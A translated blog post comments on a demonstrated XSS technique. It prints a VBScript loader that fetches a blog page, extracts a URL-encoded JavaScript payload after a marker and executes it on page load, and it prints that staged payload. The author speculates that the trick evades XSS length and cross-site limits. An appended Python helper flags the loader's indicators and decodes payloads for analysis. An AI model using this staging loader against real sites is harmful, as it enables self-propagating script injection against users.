Today I saw an Ajax Hack demonstration on 梦之光芒's blog. Finding a cross-site scripting (XSS) bug is actually easy, but doing real damage with one is still hard: stealing cookies and the like only affects individual users. The kind of exploitation seen in an XSS worm is what is truly frightening.
Let's look at his VBScript snippet:
vbscript.:execute("
dim l,s:
l=chr(13)+chr(10):
s=""sub mycode""&l:
s=s&""dim http,url,pg,p,p2,cd,ht,o""&l:
s=s&""url=""""http://hi.baidu.com/monyer/blog/item/83b70ed71b5095dda044df67.html""""""&l:
s=s&""set http=createobject(""""Microsoft.XMLHTTP"""")""&l:
s=s&""http.open """"get"""",url,false""&l:
s=s&""http.send("""""""")""&l:
s=s&""pg=http.responseText""&l:
s=s&""p=instr(1,pg,""""ILOVEUNING-BEGIN"""")""&l:
s=s&""if p=null or p<1 then exit sub""&l:
s=s&""p=instr(p,pg,chr(37))""&l:
s=s&""if p=null or p<1 then exit sub""&l:
s=s&""p2=instr(p,pg,chr(60))""&l:
s=s&""cd=mid(pg,p,p2-p)""&l:
s=s&""ht=""""eval(unescape('""""&cd&""""'))""""""&l:
s=s&""window.execScript. ht,""""jscript""""""&l:
s=s&""end sub""&l:
execute(s):
document.body.οnlοad=getref(""mycode""):
")
The staged code that gets pulled in and executed. The code fragment is as follows:
ILOVEUNING-BEGIN%0D%0Avar%20lt%3DString.fromCharCode%2860%29%3B%0D%0Avar%20gt%3DString.fromCharCode%2862%29%3B%0D%0Avar%20dq%3DString.fromCharCode%2834%29%3B%0D%0Avar%20sq%3DString.fromCharCode%2839%29%3B%0D%0A%0D%0Afunction%20myRecentPosts%28n%29%0D%0A%7B%0D%0A%20var%20r%3D%27Data%20Unavailable%27%3B%0D%0A%20if%28window.ActiveXObject%3D%3Dnull%29%20return%20r%3B%0D%0A%20var%20xmlDoc%20%3D%20new%20ActiveXObject%28%27MSXML2.DOMDocument%27%29%3B%0D%0A%20if%28xmlDoc%3D%3Dnull%29%20return%20r%3B%0D%0A%20xmlDoc.async%20%3D%20false%3B%0D%0A%20xmlDoc.resolveExternals%20%3D%20false%3B%0D%0A%20if%28%21xmlDoc.load%28decodeURI%28myref%29+%27/rss%27%29%29%20return%20r%3B%0D%0A%20var%20oItems%3DxmlDoc.documentElement.selectNodes%28%27//item%27%29%3B%0D%0A%20if%28oItems%3D%3Dnull%29%20return%20r%3B%0D%0A%20r%3D%27%27%3B%0D%0A%20nItems%3DoItems.length%3B%0D%0A%20if%28nItems%3En%29%20nItems%3Dn%3B%0D%0A%20for%28i%3D0%3Bi%3CnItems%3Bi++%29%0D%0A%20%7B%0D%0A%20%20var%20t%2Cl%2Co%3B%0D%0A%20%20var%20oItem%3DoItems%28i%29%3B%0D%0A%20%20o%3DoItem.selectSingleNode%28%27title%27%29%3B%20if%28%21o%29continue%3B%20t%3Do.text%3B%0D%0A%20%20o%3DoItem.selectSingleNode%28%27link%27%29%3B%20if%28%21o%29continue%3B%20l%3Do.text%3B%0D%0A%20%20r+%3Dlt+%27a%20href%3D%27+dq+l+dq+%27%20target%3D_blank%27+gt+%27%u2606%20%27+t+lt+%27/a%27+gt%3B%0D%0A%20%20r+%3Dlt+%27br%20/%27+gt%3B%0D%0A%20%7D%0D%0A%20r+%3Dlt+%27div%20class%3Dline%27+gt+lt+%27/div%27+gt%3B%0D%0A%20return%20r%3B%0D%0A%7D%0D%0A%0D%0Afunction%20myAddMod%28sWhere%2CsId%2CsTargetId%2CsTitle%2CsHTML%29%0D%0A%7B%0D%0A%20var%20ot%3Ddocument.getElementById%28sTargetId%29%3B%0D%0A%20if%28ot%3D%3Dnull%29%20return%3B%0D%0A%20var%20s%3Dlt+%27div%20class%3Dmod%20id%3D%27+sId+gt%3B%0D%0A%20s+%3Dlt+%27table%20class%3Dmodth%20cellSpacing%3D0%20cellPadding%3D0%20width%3D100%25%20border%3D0%27+gt%3B%0D%0A%20s+%3Dlt+%27tbody%27+gt+lt+%27tr%27+gt%3B%0D%0A%20s+%3Dlt+%27td%20class%3Dmodtl%20width%3D7%27+gt+%27%20%27+lt+%27/td%27+gt%3B%0D%0A%20s+%3Dlt+%27td%20class%3Dmodtc%20noWrap%27+gt+lt+%27div%20class%3Dmodhead%27+gt+lt+%27span%20class%3Dmodtit%27+gt+sTitle+lt+%27/span%27+gt+lt+%27/div%27+gt+lt+%27/td%27+gt%3B%0D%0A%20s+%3Dlt+%27td%20class%3Dmodtc%20noWrap%20align%3Dright%27+gt+lt+%27/td%27+gt%3B%0D%0A%20s+%3Dlt+%27td%20class%3Dmodtr%20width%3D7%27+gt+%27%20%27+lt+%27/td%27+gt%3B%0D%0A%20s+%3Dlt+%27/tr%27+gt+lt+%27/tbody%27+gt+lt+%27/table%27+gt%3B%0D%0A%20s+%3Dlt+%27div%20class%3Dmodbox%20id%3Dm_%27+sId+gt+sHTML+lt+%27/div%27+gt%3B%0D%0A%20s+%3Dlt+%27/div%27+gt%3B%0D%0A%20ot.insertAdjacentHTML%28sWhere%2C%20s%29%3B%0D%0A%7D%0D%0A%0D%0AmyAddMod%28%27afterEnd%27%2C%27mod_myrecent%27%2C%27mod_profile%27%2C%27%u6700%u8FD1%u53D1%u8868%u6587%u7AE0%27%2CmyRecentPosts%2810%29%29%3B
This way the code is loaded from the same site. Looking at it from another angle, does this get around the usual limits on submitting data in an Ajax Hack (off-site submissions have no permission, and XSS payload length is restricted)? Heh, I haven't tested this myself. (An Interesting Ajax Hack Demonstration, https://www.unjs.com)
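As an added defender's example (not code from the original post or its author), the Python helper below flags the indicators of the loader pattern described above and decodes a staged payload the way JavaScript's legacy unescape() would, so an analyst can read what is staged rather than run it. The ILOVEUNING-BEGIN marker and the cut points (first '%' after the marker, up to the next '<') come from the page; the indicator regexes and the sample page are assumptions constructed here.

```python
import re
from typing import List, Optional

# Legacy JavaScript unescape(): %XX is one code unit, %uXXXX one UTF-16 code unit.
_ESC = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")


def js_unescape(s: str) -> str:
    """Decode like JavaScript's unescape(); urllib.parse.unquote does not
    understand the %uXXXX form the staged payload uses (e.g. %u2606)."""
    return _ESC.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


# Indicators of the loader pattern on this page: a vbscript: URL that builds and
# execute()s code, an XMLHTTP fetch, and execScript/eval(unescape()) on the
# response. These regexes are assumptions for review-time triage, not a blocklist.
STAGER_INDICATORS = {
    "vbscript_execute": re.compile(r"vbscript\s*\.?:\s*execute", re.I),
    "xmlhttp_fetch": re.compile(r"createobject\(\s*\"+Microsoft\.XMLHTTP", re.I),
    "execscript_jscript": re.compile(r"execScript\b.*jscript", re.I),
    "eval_unescape": re.compile(r"eval\s*\(\s*unescape\s*\(", re.I),
    "onload_via_getref": re.compile(r"onload\s*=\s*getref\s*\(", re.I),
}


def scan_stager_indicators(text: str) -> List[str]:
    """Names of the indicators present in text, in dictionary order."""
    return [name for name, rx in STAGER_INDICATORS.items() if rx.search(text)]


def extract_staged_payload(page: str, marker: str = "ILOVEUNING-BEGIN") -> Optional[str]:
    """Recover the staged payload for reading: the same cut the loader makes
    (first '%' after the marker up to the next '<'), decoded instead of executed."""
    start = page.find(marker)
    if start < 0:
        return None
    p = page.find("%", start)
    if p < 0:
        return None
    end = page.find("<", p)
    if end < 0:
        end = len(page)
    return js_unescape(page[p:end])


# Constructed sample: a post body carrying the marker and a short encoded payload.
SAMPLE_PAGE = (
    "<div>ILOVEUNING-BEGIN%0D%0Avar%20lt%3DString.fromCharCode%2860%29%3B"
    "%0D%0Aalert%28%27%u2606%27%29%3B</div>"
)

if __name__ == "__main__":
    print(extract_staged_payload(SAMPLE_PAGE))
```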
Another idea is 剑心's approach of writing the script in fragments and then eval'ing it. Combining these two ideas, perhaps we can work miracles even with very restrictive XSS vulnerabilities!